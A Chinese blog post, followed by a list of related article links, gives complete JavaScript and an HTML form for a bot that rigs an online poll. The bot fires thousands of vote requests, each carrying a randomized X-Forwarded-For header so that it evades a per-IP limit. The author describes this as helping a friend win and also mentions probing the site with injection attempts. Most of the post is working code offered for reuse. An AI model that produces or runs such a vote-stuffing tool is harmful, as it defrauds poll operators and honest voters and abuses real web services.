帮朋友忙网络投票,粗粗地看了下,投票没有什么限制,仅有一个ip校验:每天每个ip仅能投票一次。

也就是说,可以写一个程序,自动更换IP地址(伪造IP地址),实现批量刷票的目的。于是我写了一个投票机器人。。。

解决办法

1、伪造ip,http协议中,request有个属性:"X-Forwarded-For",这个属性值就是服务器端的程序所能获取的ip。通过request.setRequestHeader("X-Forwarded-For","10.12.10.1");

以下代码用于生成随机IP地址:

function r(min,max){

    return Math.floor(min+Math.random()*(max-min));

}

function getRandomIp(){

    return r(1,255) + "." + r(1,255) + "." + r(1,255)+ "." + r(1,255);

}

2、网络投票全代码,投票地址已经隐去:

<span style="font-size: small;"><span style="line-height: 18px;"><script>

function CreateXMLHttp2(){

var xmlhttp=null;  

if (window.XMLHttpRequest)
 {  xmlhttp = new XMLHttpRequest();  } 
 if (!xmlhttp&&window.ActiveXObject) 
 {
      try 
     {
          xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.5.0") 
     } 
     catch(e) 
     {
          try 
         {
              xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.4.0")
          } 
         catch(e) 
         {
              try

              {
                  new ActiveXObject("Msxml2.XMLHTTP")
              } 
             catch(e)
              { 
                 try{new ActiveXObject("Microsoft.XMLHTTP")}catch(e){} 
             } 
         } 
     }
  } 
 if(!xmlhttp){alert("XMLHTTP不可用。即将跳转到非Ajax页面。");location="nonAjax.htm"}

return xmlhttp;

}  

var g_i=0;

var timer;

function $(obj){

    return document.getElementById(obj);

}  

function onSearch(){

    var g_xmlhttp=CreateXMLHttp2();  

    if (!g_xmlhttp){

        alert("你的浏览器不支持ajax");

        return;

    }

    var idVal = $("id").value;

    var sendData="id="+idVal;

    var fakeIP=getRandomIp();  

    var total = $("total").value;

    var intervalTime = $("intervalTime").value;

    var timeRemain = (total-g_i)*intervalTime/1000;

    $("res").innerHTML="已投票:" + g_i +"</br>估计剩余时间:" + timeRemain + "秒"  + "</br>当前伪造IP:" + fakeIP+"</br>";

    //alert(fakeIP);return ;

    try{

    g_xmlhttp.open("GET","http://www.xxx.com/xly/tp/tp.php?id=" + idVal,true);

    g_xmlhttp.setRequestHeader("Content-Length",sendData.Length);

    g_xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    //伪造ip的属性

    g_xmlhttp.setRequestHeader("X-Forwarded-For",fakeIP);

    g_xmlhttp.onreadystatechange=function(){

        if(/*g_xmlhttp.status==200*/g_xmlhttp.readyState==4){

            if(++g_i<total){

                timer = setTimeout("onSearch()",intervalTime);

            }

            if(g_i >= total){

                alert("本次投票完成");

            }

        }

    }

    g_xmlhttp.send(sendData);

    }catch(e){  

    }

}  

function r(min,max){

    return Math.floor(min+Math.random()*(max-min));

}

function getRandomIp(){

    return r(1,255) + "." + r(1,255) + "." + r(1,255)+ "." + r(1,255);

}

function stopSearch(){

    clearTimeout(timer);

}

function startInit(){

$("res").innerHTML=""

}

</script>

<form name="form1" method="post" action="" id="form1">

    <div>

        <br />  

        <input id="ip" type="hidden" value="124.22.11." />

        <br />

        投票间隔(单位毫秒):

        <input id="intervalTime" type="text" value="200" />

        <br />

        投票总数:

        <input id="total" type="text" value="10000" />

        </br>

        投票ID:

        <input id="id" type="text" value="77" />

        </br>

        <input id="search" type="button" onclick="startInit();onSearch();"

            value="开始" />

        &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

        <input id="search" type="button" onclick="stopSearch();" value="停止" />

        <br />

        <br />

        <span id="res"></span>

        <br />

        <br />

    </div>

</form>

</span></span>

需要注意的是,不能投票太快,投票时间要有间隔,主要是怕服务器被投宕机了。试着给注入下,发现应用和数据库是在同一台机器上,每次投票,应用要执行1次DB查询,是查ip+id,如果查询验证成功,则执行1次DB的插入。

希望这个例子对大家有所启发。

【我们开发有力量之二】利用javascript制作批量网络投票机器人(自动改IP)的更多相关文章

  1. 一步步教你如何在ubuntu虚拟机中安装QEMU并模拟arm 开发环境(二)rootfs制作

    过了,一天,周又到了,博主终于可以拿出时间来把上一次没有给大家展示完了的内容今天在这里一并展示给大家,希望和大家共同进步,共同学习,同时我也虔诚的希望各位业界的朋友把自己的工作经验拿出来大家一起分享, ...

  2. 利用Javascript制作网页特效(其他常见特效)

    设置为首页和加入收藏夹 ①:在body标签内输入以下代码: <a onclick="this.style.behavior='url(#default#homepage)'; this ...

  3. 利用Javascript制作网页特效(窗口特效)

    全屏显示窗口 利用fullscreen=yes可以制作全屏显示窗口. ①:在body标签内输入以下代码: <div align="center"> <input ...

  4. 利用Javascript制作网页特效(图像特效)

    图像是文本的解释和说明,在网页中的适当位置放置一些图像,不仅可以使文本更加容易阅读,而且可以使网页更加具有吸引力. 当鼠标指针经过图像时图像振动效果 ①:在head标签内输入以下代码: <sty ...

  5. 利用Javascript制作网页特效(时间特效)

    在网页中经常可以看到各种各样的动态时间显示,在网页中合理地使用时间可以增加网页的时效感. 显示当前时间 getHours().getMinutes().getSeconds()分别获得当前小时数.当前 ...

  6. 利用JavaScript制作计算器

    <html> <head> <meta charset="utf-8"> <title>无标题文档</title> &l ...

  7. 利用JavaScript制作简易日历

    <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <met ...

  8. 利用zxing制作彩色,高容错,支持中文等UTF编码的QR二维码图片

    利用zxing制作彩色,高容错,支持中文等UTF编码的QR二维码图片.代码如下 import java.awt.Color;import java.io.File;import java.util.H ...

  9. 利用javascript:void(0)制作假的提交按钮替代button

    在写html页面,我们很自然的在表单提交的地方采用button来作为提交按钮,但是,用<button type=”button”>按钮</button>作为提交代码会有个问题, ...

随机推荐

  1. 关于localStorage 应用总结

    window.localStorage 设置数据几种方式 1.localStorage.setItem('name',c); 2.localStorage.name=c; 3.localStorage ...

  2. 英文词频统计的java实现方法

    需求概要 1.读取文件,文件内包可含英文字符,及常见标点,空格级换行符. 2.统计英文单词在本文件的出现次数 3.将统计结果排序 4.显示排序结果 分析 1.读取文件可使用BufferedReader ...

  3. Delphi控件-复合控件【转】

    复合控件复合控件是Delphi控件中非常重要的一种控件,复合控件就是将两个或两个以上的控件重新组合成一个新的控件.例如TspinEdit.TlabeledEdit.TDBNavigator等就是复合控 ...

  4. 学习laravel源码之中间件原理

    刨析laravel源码之中间件原理 在看了laravel关于中间件的源码和参考了相关的书籍之后,写了一个比较简陋的管道和闭包实现,代码比较简单,但是却不好理解所以还是需要多写多思考才能想明白其中的意义 ...

  5. [转帖]剖析淘宝TDDL(TAOBAO DISTRIBUTE DATA LAYER)

    剖析淘宝TDDL(TAOBAO DISTRIBUTE DATA LAYER) 博客分类: 原博客地址: http://qq85609655.iteye.com/blog/2035176 distrib ...

  6. 【刷题】BZOJ 3144 [Hnoi2013]切糕

    Description Input 第一行是三个正整数P,Q,R,表示切糕的长P. 宽Q.高R.第二行有一个非负整数D,表示光滑性要求.接下来是R个P行Q列的矩阵,第z个 矩阵的第x行第y列是v(x, ...

  7. 【刷题】BZOJ 1934 [Shoi2007]Vote 善意的投票

    Description 幼儿园里有n个小朋友打算通过投票来决定睡不睡午觉.对他们来说,这个问题并不是很重要,于是他们决定发扬谦让精神.虽然每个人都有自己的主见,但是为了照顾一下自己朋友的想法,他们也可 ...

  8. 菜鸡的考场emacs配置

    (setq default-tab-width 4) (setq c-default-style "awk") (setq default-cursor-type 'bar) (e ...

  9. 【CF248E】Piglet's Birthday(动态规划)

    [CF248E]Piglet's Birthday(动态规划) 题面 洛谷 CodeForces 翻译: 给定\(n\)个货架,初始时每个上面有\(a[i]\)个蜜罐. 有\(q\)次操作,每次操作形 ...

  10. 构建工具-----Gradle(二)-----myeclipse 10和myeclipse2015安装gradle插件----其他版本的myeclipse类似

    我们需要给myeclipse安装gradle的插件.这样myeclipse就能识别到gradle项目了,直接加载进去即可. 我们先安装配置系统命令行的gradle,挺简单的,下载后配置环境变量即可,详 ...